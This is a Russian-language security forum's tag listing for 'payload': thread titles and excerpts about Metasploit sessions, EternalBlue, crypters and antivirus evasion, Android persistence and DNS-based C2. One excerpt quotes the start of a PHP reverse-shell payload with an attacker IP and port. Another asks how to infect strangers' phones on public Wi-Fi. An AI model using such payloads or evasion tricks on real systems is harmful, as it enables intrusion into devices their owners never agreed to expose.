payload

  1. Admin80

    Проблема Shellter и exe

    Никак не пойму как прикрутить в Shellter свой payload в формате exe может кто сталкивался?
  2. Vertigo

    Soft Pixload: вредоносный скрипт в изображении

    Добрый день,Уважаемые Форумчане и Друзья. Когда-то стали известны способы размещения вредоносного кода в изображении. Немногим позднее появилась атака Polyglot,когда вредоносный файл одновременно является изображением и JavaScript-кодом. В основном,это касалось файлов BMP,при этом,2 первых...
  3. O

    Проблема Payload FUD + Metasploit???

    Привет Кодебай! Какие генераторы актуальны сейчас? (FatRat, Veil, Shellter не предлогать, паляться) и как прикрутить этот пэйлоад к эксплоиту ms17-10 в metasploit?
  4. Freeze Gamer

    Проблема Склейка Metasploit payload с apk

    Доброго времени суток всем! На днях поставил Metasploit в Termux. При попытке добавить payload в уже существующий apk Metasploit пожаловался на отсутствие Zipalign. Нашёл много разных версий, но под aarch64 не было не одной. Буду благодарен за помощь в решении данного вопроса.
  5. P

    Проблема Умирает сессия при попытке портскана

    Сессия windows/meterpreter/reverse_tcp умирает при попытке портскана сети через proxy pivot. Т.е. пейлоад крашится на таргет хосте при большом кол-ве TCP соединений. В случае с reverse_http такого не происходит, но скорость скана очень низкая. Есть какое-то решение этой проблемы? Буду премного...
  6. kombat

    Проблема Не получается создать сессию

    Exploit completed, but no session was created. Не получается создать сессию подскажите что делать ?? Гуглил там на не которых формуах говорили то что надо открыть порт, но порт открыть тоже не выходит ((
  7. Tayrus

    Статья C2 с использованием DNS по HTTPS (DoH)

    Постоянный доступ к сети цели является одним из основных этапов в любой наступательной операции. Во время нашей деятельности мы используем различные типы маяков для повседневных операций. При сбое всех маяков они могут восстановить доступ к сети цели. Таким образом, маяк должен...
  8. kombat

    Решено И снова Metasploit (Payload)

    И снова у меня проблемы с полезной нагрузкой на этот раз выбрал нужный эксплойт и нужную нагрузку но что то пошло не так Подскажите что я делаю не так ?!
  9. kombat

    Решено Metasploit (Failed to load module: payload)

    Не могу подобрать полезную нагрузку,какую только не ставлю пишет не удалось подключить модуль,помогите решить проблему и подскажите как подбирать полезные нагрузки на ОС
  10. R

    Проблема EternalBlue. Did not receive a response from exploit packet.

    Помогите пожалуйста, почему возникает эта ошибка? Можно ли как-то от нее избавиться, и если можно, то как?
  11. kravl

    Как создать payload который будет работать в режиме persistence ?

    Вопрос: Как сделать так что бы сессия была многократная и я мог прослушивать каждый раз один и тот же ПК. На сколько я знаю как-то можно это дело прописать в реестр и автозапуск только как ? Вот так на сколько я понимаю пишется сам пейлоад для получения сессии meterpreter, но он одноразовый...
  12. Литиум

    Soft ASWCrypter - Generating Payloads.

    Всем привет. Встречайте новинку - ASWCrypter. ASWCrypter лучше TheFatRat. Разработчик -== AbedAlqaderSwedan1 Страница разработчика -== AbedAlqaderSwedan1/ASWCrypter Внимание! Автор не несет никакой ответственности за плохое использование этого инструмента! Введение. ASWCrypter - Сценарий...
  13. AnnaDavydova

    Статья Обход антивируса с помощью зашифрованных Payload, используя VENOM

    В настоящее время многие вредоносные программы и Payload используют методы шифрования и методы пакетирования с применением Packers, чтобы обойти антивирусное программное обеспечение, поскольку антивирусу трудно обнаружить зашифрованные и упакованные вредоносные программы и Payload. В данной...
  14. M

    Проблема jpg +payload php

    Прохожу интересный CTF и там возможность подгрузить только jpg, проверка на jpg судя по всему идет на сервере, т.к. попытки подмены понятий через burp не проходят. Создал через FatRat стандартную php нагрузку /*<?php /**/ error_reporting(0); $ip = '192.168.168.168'; $port = 6969; if (($f =...
  15. U

    Проблема Выбор нагрузки / payloads? В чем отличия?

    Привет моему любимому комьюнити! При создании rat-ника и другой нечисти, в конце следует выбрать метод "нагрузки". в Метасплоите имеются следующие: windows/x64/shell/bind_tcp Listen for a connection (Windows x64), Spawn a piped command shell (Windows x64) (staged)...
  16. U

    Решено Публичный статический ip для rat

    Приветсвую! столкнулся с проблемой: при создании ratов, payloadов и другой нечисти, для атакующей машины требуется указать ip LHOST, RHOST. Проблема, что ip у меня динамический. Собстевнно, как можно решить эту проблему? 2) Посоветуйте плз сервисы по типу Free Dynamic DNS - Managed DNS -...
  17. Vertigo

    Статья Terminator - генератор Payloads для Metasploit

    Добрый день,Уважаемые Форумчане,Друзья и те,кто следит за пульсом ИБ. Хочу порадовать форум сегодня новинкой,которая генерирует различные backdoor. Автора этого замечательного генератора зовут Mohamed Nour. Помогать мне сегодня будут сделать обзор дистрибутивы ArchStrike и BlackArch. Простите...
  18. P

    Полезная нагрузка участников Wi-Fi

    Хай! С помощью телефона (андроид) подключился к общедоступной точке доступа в магазине. Fing (fing.io) показывает около 20-ти участников, подключенных также к этой точке. Всем присвоены локальные адреса (192.168.1.XXX) Вопрос - возможно ли мне остальным участникам загрузить на телефоны что-то...
  19. Rollly

    Статья Закрепление в системе Android

    С первым днём весны! Сегодня покажу как закрепиться в системе андроид. Скрипт будет работать до перезагрузки!. Наверняка у всех такое было, когда умирает сессия при пропадании соединения, и нет возможности запустить её снова, и успеть сделать все дела. Нам необходимо создать полезную нагрузку...
  20. I

    reverse_tcp или 50 оттенков серого

    Всем привет! Путешествуя по безграничным просторам всемирной паутины и знакомясь с paylodaми в msf, не трудно заметить, что всё в конечном итоге сводится к использованию reverse_tcp... Однако есть же, как минимум, reverse_http и reverse_https, которые, как мне кажется, должны быть не менее...